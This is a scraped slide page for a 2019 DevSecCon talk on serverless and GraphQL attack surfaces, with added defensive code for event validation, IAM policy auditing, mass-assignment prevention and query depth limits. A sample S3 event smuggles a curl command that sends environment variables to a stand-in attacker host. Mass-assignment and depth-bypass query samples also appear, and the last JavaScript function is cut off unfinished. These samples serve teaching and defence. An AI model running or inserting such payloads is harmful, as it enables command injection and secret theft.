Singapore | 28 Feb - 01 Mar 2019
An Attacker's View of Serverless
and GraphQL Apps
Sharath Kumar Ramadas
About Me
• Lead Solutions Engineer
• we45 - An AppSec Company
• Trainer - DevSecOps, Containers & Serverless
• Developer - DVFAAS, Orchestron & ThreatPlayBook
• Developer → DevOps → DevSecOps
@sharathkramadas
Agenda
• Intro to Serverless
• Serverless Attacks
• Intro to GraphQL
• GraphQL Attacks
• Demos
SERVERLESS
Serverless
• Functions deployed as ephemeral containers/VMs
• Functions As A Service (FAAS)
• Event trigger architecture
• Supports major runtimes
• Python, Node.js, C#, Go, Ruby
• Custom runtimes are also supported
Serverless Journey
Functions
Why Serverless?
• Pay per usage
• No server management
• Microservices Friendly
• Auto-Scalable
• Focus on code and features, don’t worry about servers
FAAS Providers
Architecture
Serverless Use-Cases
• ChatBots
• Event driven apps
• Notification Channels (SMS, Email)
• Scheduled Jobs
• Product websites
• Many more
Let’s Deploy!
Functions with Events
An Attacker’s View
• Functions are still code, with the same bug classes as any other code
• Often no web framework involved, so none of its built-in input handling or security defaults
• Every event trigger is an entry point, so functions-as-events widen the attack surface
• Developers now own the server-side configuration that used to sit with ops
• Still needs configuration (roles, triggers, timeouts, memory)
Attackers are Snipers!
• Aimed
• Committed
• Patient
• Invisible
• Take a clear shot
Claim your expenses
Over-Privileged Functions
• A function with broad privileges turns a code bug into an infrastructure compromise
• Secrets placed in function environment variables sit in plain text unless you encrypt them
• Misconfigured roles open up a wide spectrum of attacks
• Event triggers are the most exposed entry points, because they often carry no authentication or authorization
• Under attack, the pay-per-usage model turns out to be expensive
Accenture S3 Breach
Fedex Breach
Serverless Top 10
• Event data injection
• Broken Authentication
• Insecure deployment configuration
• Over privileged function permissions & roles
• Inadequate function monitoring and logging
• Insecure 3rd party dependencies
• Insecure application secrets storage
• DoS and financial resource exhaustion
• Function Execution Flow Manipulation
• Improper Exception Handling and Verbose Error Messages
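The first item, event data injection, is easiest to see with a non-HTTP trigger, where nothing in front of the function validates anything. The Python below is an added example written for this page, not code from the talk or from DVFaaS. It contrasts a handler that interpolates an S3 object key into a shell command with one that validates the key against an allowlist and hands an argv list straight to the process, and it returns a generic error outward while logging the detail, which is the point of the last Top 10 item (verbose error messages). The event records, bucket name and the `pdftoppm` command are constructed for the example.

```python
import json
import re
import shlex
import subprocess
from urllib.parse import unquote_plus

# Constructed S3 ObjectCreated notification, shaped like the record AWS Lambda
# hands to a function subscribed to a bucket (sample data, not from a real account).
BENIGN_EVENT = {
    "Records": [{
        "eventSource": "aws:s3",
        "s3": {"bucket": {"name": "expense-receipts"},
               "object": {"key": "receipt-2019-02.pdf"}},
    }]
}

# Same event with an attacker-chosen key. Whoever can write to the bucket
# (an upload form, a partner, a leaked key) controls this string.
HOSTILE_EVENT = {
    "Records": [{
        "eventSource": "aws:s3",
        "s3": {"bucket": {"name": "expense-receipts"},
               "object": {"key": "x.pdf; curl http://attacker.example/$(env) #"}},
    }]
}

def vulnerable_command(event):
    """How an injectable handler builds its command: the object key from the
    event is interpolated into a shell string that os.system() would run."""
    key = unquote_plus(event["Records"][0]["s3"]["object"]["key"])
    return f"pdftoppm -png /tmp/{key} /tmp/{key}"

# Allowlist for the key: one path component, restricted charset, .pdf suffix.
SAFE_KEY = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.pdf$")

def hardened_argv(event):
    """Validates the event before use and returns an argv list, so no shell
    ever interprets the key. Raises ValueError on anything unexpected."""
    record = event["Records"][0]
    if record.get("eventSource") != "aws:s3":
        raise ValueError("unexpected event source")
    key = unquote_plus(record["s3"]["object"]["key"])
    if not SAFE_KEY.fullmatch(key) or ".." in key:
        raise ValueError(f"rejected object key {key!r}")
    return ["pdftoppm", "-png", f"/tmp/{key}", f"/tmp/{key}"]

def handler(event, context=None, execute=False):
    """Lambda-style entry point. With execute=False it only returns the argv,
    so the example runs without the converter installed."""
    try:
        argv = hardened_argv(event)
    except ValueError as exc:
        # Detail goes to the function log; the caller gets a generic message.
        print(f"rejected event: {exc}")
        return {"statusCode": 400, "body": json.dumps({"error": "invalid object key"})}
    if execute:
        subprocess.run(argv, check=True)   # shell=False: argv goes straight to execve
    return {"statusCode": 200, "body": json.dumps({"argv": argv})}

def shell_would_run(command):
    """Tokenizes a shell string the way sh would, to show what the vulnerable
    path hands the shell (inspection only; nothing is executed)."""
    return shlex.split(command)
```

`shell_would_run(vulnerable_command(HOSTILE_EVENT))` shows `curl` arriving as its own command word; `handler(HOSTILE_EVENT)` never gets that far. The same pattern applies to any trigger payload (queue messages, scheduled-event input, database streams): treat every field as untrusted and validate before it touches a command, a query or a file path.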
Serverless (Security) Best Practices
• Functions with minimal access credentials
• Remove insecure dependencies before production
• Run SAST scans before code commit
• Restrict memory usage for a function
• Encrypt secrets; do not put them in plain environment variables
• Use the FaaS provider’s authorization for access control (e.g. AWS Cognito)
• Write security test cases and run in CI/CD
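For the first practice, minimal access credentials, here is a check that can run in CI against a function role's policy document before deployment. It is an added example written for this page, not code from the talk or DVFaaS. The two policy documents, the account ID, the resource names and the list of high-risk actions are constructed for illustration; the matching rules (a bare `*`, a `service:*` glob, a trailing `*` prefix) follow how IAM evaluates `Action`.

```python
import json

# Constructed inline policy of the kind a "do everything" function role ends
# up with (sample data, not taken from any real deployment).
OVER_PRIVILEGED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["s3:*"], "Resource": "arn:aws:s3:::*"},
    ],
}

# The same expense-claim function scoped to the one table and bucket it uses.
LEAST_PRIVILEGE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
         "Resource": "arn:aws:dynamodb:ap-southeast-1:123456789012:table/expenses"},
        {"Effect": "Allow",
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::expense-receipts/*"},
    ],
}

# Actions that let a compromised function escalate or read secrets. This is a
# hypothetical starter list for the example; extend it for your environment.
HIGH_RISK_ACTIONS = {
    "iam:PassRole", "iam:CreatePolicyVersion", "iam:AttachRolePolicy",
    "sts:AssumeRole", "lambda:UpdateFunctionCode", "lambda:AddPermission",
    "secretsmanager:GetSecretValue", "ssm:GetParameter", "ssm:GetParameters",
    "kms:Decrypt",
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _grants(pattern, action):
    """IAM action matching: '*' matches all, a trailing '*' is a prefix glob,
    otherwise compare case-insensitively."""
    if pattern == "*":
        return True
    if pattern.endswith("*"):
        return action.lower().startswith(pattern[:-1].lower())
    return pattern.lower() == action.lower()

def audit_policy(policy):
    """Returns [(statement index, finding), ...] for Allow statements that use
    wildcards or grant high-risk actions. An empty list passes this check."""
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*":
                findings.append((i, "Action '*' grants every API in the account"))
                continue
            if action.endswith(":*"):
                findings.append((i, f"service-wide wildcard action {action}"))
            risky = sorted(a for a in HIGH_RISK_ACTIONS if _grants(action, a))
            if risky:
                findings.append((i, f"{action} grants high-risk action(s): {', '.join(risky)}"))
        for resource in _as_list(stmt.get("Resource", [])):
            if resource == "*" or resource.endswith(":*"):
                findings.append((i, f"resource wildcard {resource} instead of a specific ARN"))
    return findings

def audit_policy_json(text):
    """Same check over a policy document as stored in a file or template."""
    return audit_policy(json.loads(text))
```

`audit_policy(OVER_PRIVILEGED_POLICY)` reports four findings (the account-wide action, the `s3:*` service glob and both resource wildcards); the scoped policy reports none. The check is deliberately coarse: it will not catch a narrowly named action that is still more than the function needs, so pair it with a review of what the code actually calls.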
GraphQL
GraphQL
• A query language for APIs
• Tech from Facebook
• Query what you want forget about the ‘REST’
• Single endpoint for API calls
• Lightweight
REST vs GraphQL
Terminology
• Type
• Schema
• Query
• Mutation
• Subscription
• Introspection
• Schema Stitching
Let’s Demo
An Attacker’s View
• No response size limiting by default, so one query can pull arbitrarily large, deeply nested results
• Introspection is nice! It hands the attacker the whole schema, including fields the UI never shows
• Single endpoint, so per-route access control does not apply; authorization has to happen in each resolver
Demo
Want to get more powers!
Mass Assignment
• Frameworks let you save the raw dump of HTTP request data straight into a model
• Attackers can guess the sensitive fields (role, limits, flags)
• Writing those fields lets them escalate privileges
• GraphQL has introspection enabled by default
• Introspection leaks the sensitive field names, so there is nothing left to guess
• GraphQL supports a JSON scalar, which accepts any object and bypasses typed input validation
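What this looks like inside a resolver, as an added Python example (not code from the talk or from the demo app): a profile mutation declared with a `JSON` scalar input dumps whatever the client sends onto the user record, so the `role` and `approvedExpenseLimit` fields that introspection revealed become writable. The hardened resolver models the typed `UpdateProfileInput` as an allowlist and adds the ownership check that a single endpoint cannot do for you. The schema, user records and field names are hypothetical.

```python
import copy

# Constructed in-memory user table standing in for the datastore behind the
# resolver (sample data).
USERS = {
    "u1": {"id": "u1", "displayName": "alice", "email": "alice@example.com",
           "role": "user", "approvedExpenseLimit": 500},
    "u2": {"id": "u2", "displayName": "bob", "email": "bob@example.com",
           "role": "user", "approvedExpenseLimit": 500},
}

# The only fields a user may change about themselves; everything else
# (id, role, approvedExpenseLimit) is server-controlled.
UPDATABLE_FIELDS = {"displayName", "email"}

class GraphQLError(Exception):
    """Stands in for the error a GraphQL server returns to the client."""

def vulnerable_update_profile(db, caller_id, args):
    """Resolver for `updateProfile(id: ID!, input: JSON!)`. The JSON scalar
    accepts any object and the resolver dumps it onto the record, so every
    field introspection showed on User is writable by any caller."""
    user = db[args["id"]]
    user.update(args["input"])
    return user

def hardened_update_profile(db, caller_id, args):
    """Same mutation as `updateProfile(id: ID!, input: UpdateProfileInput!)`.
    The allowlist mirrors what the typed input lets through the GraphQL
    validator; the ownership check stops edits to other users' records."""
    target_id = args["id"]
    if target_id != caller_id:
        raise GraphQLError("not authorized to edit this profile")
    payload = args["input"]
    unknown = set(payload) - UPDATABLE_FIELDS
    if unknown:
        raise GraphQLError(f"unknown field(s) in UpdateProfileInput: {sorted(unknown)}")
    if "email" in payload and "@" not in str(payload["email"]):
        raise GraphQLError("invalid email")
    user = db[target_id]
    user.update({k: payload[k] for k in payload})   # only allowlisted keys remain
    return user

# Variables an attacker sends after reading the User type via introspection
# and spotting `role` and `approvedExpenseLimit` next to `displayName`.
ATTACK_ARGS = {"id": "u1",
               "input": {"displayName": "alice", "role": "admin",
                         "approvedExpenseLimit": 1_000_000}}

def run(resolver, caller_id, args):
    """Runs one mutation against a fresh copy of the data and returns
    (record after the call, error message or None)."""
    db = copy.deepcopy(USERS)
    try:
        resolver(db, caller_id, args)
        error = None
    except GraphQLError as exc:
        error = str(exc)
    return db[args["id"]], error
```

`run(vulnerable_update_profile, "u1", ATTACK_ARGS)` leaves u1 with `role == "admin"`; the hardened resolver rejects the same variables with an unknown-field error and leaves the record untouched. With a real typed input the server's validator rejects the extra fields before the resolver runs, which is why the last best practice below is to prefer input types over a generic scalar.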
GitHub Attack
Let’s burn a few dollars
Serverless Cost
Resource Exhaustion
• aka Denial-of-Service attack
• Flood the server with requests until it falls over
• Exhausts memory and compute
• Serverless + GraphQL = pay per usage + auto-scale, so the bill grows instead of the service failing
• 2 million requests * 3 dollars per query = (I will leave it to your imagination!)
Recent Attack
GraphQL (Security) Best Practices
• Disable introspection
• Disable playground in production
• Limit the query size
• Depth limiting for nested queries
• Avoid generic scalars (JSON); use typed input types
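A pre-execution gate that enforces three of these practices at once (query size limit, depth limit, introspection off), as an added Python example written for this page rather than code from the talk or from any GraphQL server library. It runs on the raw query text before execution, so a rejected query costs no resolver time and triggers no scaling. It also handles two cases a naive brace counter gets wrong: braces inside argument input objects (which are not nesting) and named fragment spreads (which are, and which an attacker can use to hide depth across fragment definitions). The sample queries and the expenses schema they target are constructed.

```python
import re

_STRING_RE = re.compile(r'"""[\s\S]*?"""|"(?:\\.|[^"\\\n])*"')
_COMMENT_RE = re.compile(r"#[^\n]*")
_TOKEN_RE = re.compile(r"\.\.\.|[{}()@]|[_A-Za-z][_0-9A-Za-z]*")

def _tokenize(query):
    """Strips strings and comments, then keeps only the tokens depth needs:
    braces, parens, spreads, directive markers and names."""
    return _TOKEN_RE.findall(_COMMENT_RE.sub("", _STRING_RE.sub("", query)))

def _skip_parens(tokens, i):
    """Index just past the ')' that matches the '(' at tokens[i]."""
    level = 0
    for j in range(i, len(tokens)):
        level += (tokens[j] == "(") - (tokens[j] == ")")
        if level == 0:
            return j + 1
    raise ValueError("unbalanced parentheses")

def _take_block(tokens, i):
    """Tokens inside the selection set opened at tokens[i] == '{', plus the
    index after its closing brace. Braces inside argument lists are ignored."""
    depth = parens = 0
    for j in range(i, len(tokens)):
        t = tokens[j]
        parens += (t == "(") - (t == ")")
        if parens == 0 and t in ("{", "}"):
            depth += 1 if t == "{" else -1
            if depth == 0:
                return tokens[i + 1:j], j + 1
    raise ValueError("unbalanced braces")

def _split_definitions(tokens):
    """Separates operation selection sets from named fragment bodies."""
    ops, frags, i = [], {}, 0
    while i < len(tokens):
        if tokens[i] == "fragment":
            name = tokens[i + 1]
            while tokens[i] != "{":
                i += 1
            frags[name], i = _take_block(tokens, i)
        elif tokens[i] == "{":
            body, i = _take_block(tokens, i)
            ops.append(body)
        elif tokens[i] == "(":            # variable definitions may hold {} defaults
            i = _skip_parens(tokens, i)
        else:                             # query/mutation keyword, operation name, directives
            i += 1
    return ops, frags

def _depth(body, frags, stack):
    """Max nesting below a selection set, with fragment spreads counted as if
    their body were pasted in place, which is how the server executes them."""
    max_d = cur = parens = i = 0
    while i < len(body):
        t = body[i]
        parens += (t == "(") - (t == ")")
        if parens == 0 and t == "{":
            cur += 1
            max_d = max(max_d, cur)
        elif parens == 0 and t == "}":
            cur -= 1
        elif parens == 0 and t == "..." and body[i + 1] not in ("on", "{", "@"):
            name = body[i + 1]             # named spread: ...FragmentName
            if name in stack:
                raise ValueError(f"fragment cycle via {name}")
            if name not in frags:
                raise ValueError(f"unknown fragment {name}")
            max_d = max(max_d, cur + _depth(frags[name], frags, stack + [name]))
            i += 1
        i += 1
    return max_d

def check_query(query, max_depth=5, max_bytes=4096, allow_introspection=False):
    """Gate to run before execution. Returns (ok, reason)."""
    if len(query.encode()) > max_bytes:
        return False, f"query exceeds {max_bytes} bytes"
    tokens = _tokenize(query)
    if not allow_introspection and {"__schema", "__type"} & set(tokens):
        return False, "introspection is disabled"
    try:
        ops, frags = _split_definitions(tokens)
        depth = max((_depth(op, frags, []) for op in ops), default=0)
    except (ValueError, IndexError) as exc:
        return False, f"malformed query: {exc}"
    if depth > max_depth:
        return False, f"depth {depth} exceeds limit {max_depth}"
    return True, f"depth {depth}"

# Constructed queries against a hypothetical expenses schema.
BENIGN = 'query Expenses { me { expenses(first: 10, filter: {status: "OPEN"}) { id amount } } }'
DEEP = "{ me { friends { friends { friends { friends { friends { friends { name } } } } } } } }"
FRAGMENT_BYPASS = """{ me { ...F } }
fragment F on User { friends { friends { ...G } } }
fragment G on User { friends { friends { friends { name } } } }"""
INTROSPECTION = "{ __schema { types { name fields { name } } } }"
CYCLIC = "{ me { ...A } } fragment A on User { ...B } fragment B on User { ...A }"
```

Depth is counted the way most depth-limit plugins count it: the fields directly under the operation are level 1. `BENIGN` passes at depth 2 even though its `filter` argument contains braces; `DEEP` is rejected at depth 7; `FRAGMENT_BYPASS` looks shallow per definition but expands to depth 6 and is rejected, while a cyclic fragment pair is reported as malformed instead of recursing forever. Depth is only a proxy for cost: a wide query over list fields at depth 2 can still be expensive, so pair this with per-field cost analysis, result pagination and the memory and timeout limits on the function itself.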
Hack It Yourself!
https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
Things to consider
• OWASP Top 10
• Serverless Top 10
• SAST and SCA tools
• Threat-Modeling
Key Takeaways
• Serverless security is still an application security problem
• Roles and permissions should be well thought out
• Secure coding practices need to be followed
• Resource limits are highly recommended
Thank You
@sharathkramadas
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Último (20)

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps - Sharath Kumar Ramadas
Singapore | 28 Feb - 01 Mar 2019

1. An Attacker's View of Serverless and GraphQL Apps
Sharath Kumar Ramadas

2. About Me
• Lead Solutions Engineer
• we45 - An AppSec Company
• Trainer - DevSecOps, Containers & Serverless
• Developer - DVFAAS, Orchestron & ThreatPlayBook
• Developer → DevOps → DevSecOps
@sharathkramadas

3. Agenda
• Intro to Serverless
• Serverless Attacks
• Intro to GraphQL
• GraphQL Attacks
• Demos

4. SERVERLESS

5. Serverless
• Functions deployed as ephemeral containers/VMs
• Functions As A Service (FAAS)
• Event trigger architecture
• Supports major runtimes
• Python, NodeJS, C#, Go, Ruby
• Custom runtimes also

6. Serverless Journey

7. Functions

8. Why Serverless?
• Pay per usage
• No server management
• Microservices friendly
• Auto-scalable
• Focus on code/features, don't worry about servers

9. FAAS Providers

10. Architecture

11. Serverless Use-Cases
• ChatBots
• Event driven apps
• Notification channels (SMS, Email)
• Scheduled jobs
• Product websites
• Lots more...

12. Let's Deploy!

13. Functions with Events

14. An Attacker's View
• Functions are still code
• No frameworks involved
• Functions as events increase the attack surface
• Developers are new to servers
• Still needs configuration

15. Attackers are Snipers!
• Aimed
• Committed
• Patient
• Invisible
• Takes a clear shot

16. Claim your expenses

17. Extensively Privileged Functions
• Functions with extensive privileges lead to infrastructure compromise
• Cloud providers store secrets in plain text
• Misconfigured roles can lead to a wide spectrum of attacks
• Events are the most vulnerable due to lack of authentication and authorization
• The pay per usage model turns out to be expensive

18. Accenture S3 Breach

19. FedEx Breach

20. Serverless Top 10
• Event data injection
• Broken authentication
• Insecure deployment configuration
• Over-privileged function permissions & roles
• Inadequate function monitoring and logging
• Insecure 3rd party dependencies
• Insecure application secrets storage
• DoS and financial resource exhaustion
• Function execution flow manipulation
• Improper exception handling and verbose error messages

21. Serverless (Security) Best Practices
• Functions with minimal access credentials
• Remove insecure dependencies before production
• Run SAST scans before code commit
• Restrict memory usage for a function
• Encrypt the secrets, avoid environment variables
• Use the FAAS provider's authorization for access control (ex: AWS Cognito)
• Write security test cases and run them in CI/CD
@sharathkramadas

22. GraphQL

23. GraphQL
• A query language for APIs
• Tech from Facebook
• Query what you want, forget about the 'REST'
• Single endpoint for API calls
• Lightweight

24. REST vs GraphQL

25. Terminology
• Type
• Schema
• Query
• Mutation
• Subscription
• Introspection
• Schema stitching

26. Let's Demo

27. An Attacker's View
• No response size limiting
• Introspection is nice!
• Single endpoint access control

28. Demo: Want to get more powers!

29. Mass Assignment
• Frameworks allow saving the raw dump of HTTP request data
• Attackers can guess the sensitive fields
• Sensitive fields can allow privilege escalation
• GraphQL has introspection enabled by default
• Introspection leaks the sensitive field information
• GraphQL supports a JSON scalar
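The mass assignment path from slide 29, as an added example that is not part of the deck or of DVFaaS: a mutation that accepts a JSON scalar and dumps it into the stored record, beside the same mutation written over an input type with an explicit field list. The user record, the field names and the request are constructed; no GraphQL library is required because the resolvers are shown as plain functions.

```javascript
// Added example (not from the slides). Schema fragments shown as comments:
//   Vulnerable: type Mutation { updateProfile(data: JSON): User }
//   Hardened:   input UpdateProfileInput { name: String, email: String }
//               type Mutation { updateProfile(data: UpdateProfileInput!): User }

// Constructed sample record; "role" is the field an attacker wants to change.
function makeUser() {
  return { id: 1, name: 'alice', email: 'alice@example.com', role: 'user' };
}

// Vulnerable resolver: `data` is a JSON scalar, so the whole client object is
// merged into the record. Introspection reveals that User has a "role" field,
// so a guessed "role" key in the request is stored as-is.
function updateProfileVulnerable(user, args) {
  Object.assign(user, args.data); // raw dump of request data into the model
  return user;
}

// Hardened resolver: the schema's input type already rejects unknown fields at
// validation; the resolver repeats the allowlist so that it still holds if the
// schema layer is bypassed, and it fails loudly rather than silently dropping keys.
const UPDATE_PROFILE_INPUT_FIELDS = ['name', 'email'];

function updateProfileHardened(user, args) {
  const unknown = Object.keys(args.data)
    .filter((k) => !UPDATE_PROFILE_INPUT_FIELDS.includes(k));
  if (unknown.length > 0) {
    throw new Error(`Unknown field(s) in UpdateProfileInput: ${unknown.join(', ')}`);
  }
  for (const k of UPDATE_PROFILE_INPUT_FIELDS) {
    if (k in args.data) user[k] = args.data[k];
  }
  return user;
}

// Constructed request: a legitimate name change with a smuggled "role" field.
const REQUEST = { data: { name: 'alice2', role: 'admin' } };

// Runs both resolvers against fresh records and reports what each one stored.
function demo() {
  const v = updateProfileVulnerable(makeUser(), REQUEST);
  const h = makeUser();
  let hardenedError = null;
  try { updateProfileHardened(h, REQUEST); } catch (e) { hardenedError = e.message; }
  return { vulnerableRole: v.role, hardenedRole: h.role, hardenedName: h.name, hardenedError };
}
```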
30. GitHub Attack

31. Let's burn a few dollars

32. Serverless Cost

33. Resource Exhaustion
• aka Denial-of-Service attack
• Overwhelming requests to crash the server
• Causes memory leaks and resource exhaustion
• Serverless + GraphQL = (pay per usage + scale)
• 2 million requests * 3 dollars per query = (I will leave it to your imagination!)

34. Recent Attack

35. GraphQL (Security) Best Practices
• Disable introspection
• Disable the playground in production
• Limit the query size
• Depth limiting for nested queries
• Avoid scalars, use input types
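Three of the practices above (query size limit, depth limit, introspection disabled in production) applied to the raw query string before it reaches the executor, as an added example that is not part of the deck: it counts selection-set nesting by brace depth while skipping string literals and comments, so it needs no GraphQL parser. The limit values and sample queries are constructed.

```javascript
// Added example (not from the slides): a pre-execution query guard.
// Constructed limits; tune them to the real schema's legitimate query shapes.
const LIMITS = { maxQueryBytes: 2000, maxDepth: 5, allowIntrospection: false };

// Maximum selection-set nesting depth of a query document. A selection set is a
// `{ ... }` block; braces inside "strings", """block strings""" and # comments
// are skipped so an attacker cannot hide or fake nesting with them.
function selectionDepth(query) {
  let depth = 0, max = 0, i = 0;
  while (i < query.length) {
    const c = query[i];
    if (c === '#') {                          // comment runs to end of line
      while (i < query.length && query[i] !== '\n') i++;
    } else if (query.startsWith('"""', i)) {  // block string
      const end = query.indexOf('"""', i + 3);
      i = end === -1 ? query.length : end + 3;
      continue;
    } else if (c === '"') {                   // plain string, honour \" escapes
      i++;
      while (i < query.length && query[i] !== '"') i += query[i] === '\\' ? 2 : 1;
    } else if (c === '{') {
      depth++;
      if (depth > max) max = depth;
    } else if (c === '}') {
      depth--;
    }
    i++;
  }
  return max;
}

// Returns null when the query may run, otherwise a rejection reason. Checks are
// ordered cheapest first so an oversized body is refused before it is scanned.
// Only __schema and __type are introspection roots; __typename stays allowed.
function checkQuery(query, limits = LIMITS) {
  const bytes = Buffer.byteLength(query, 'utf8');
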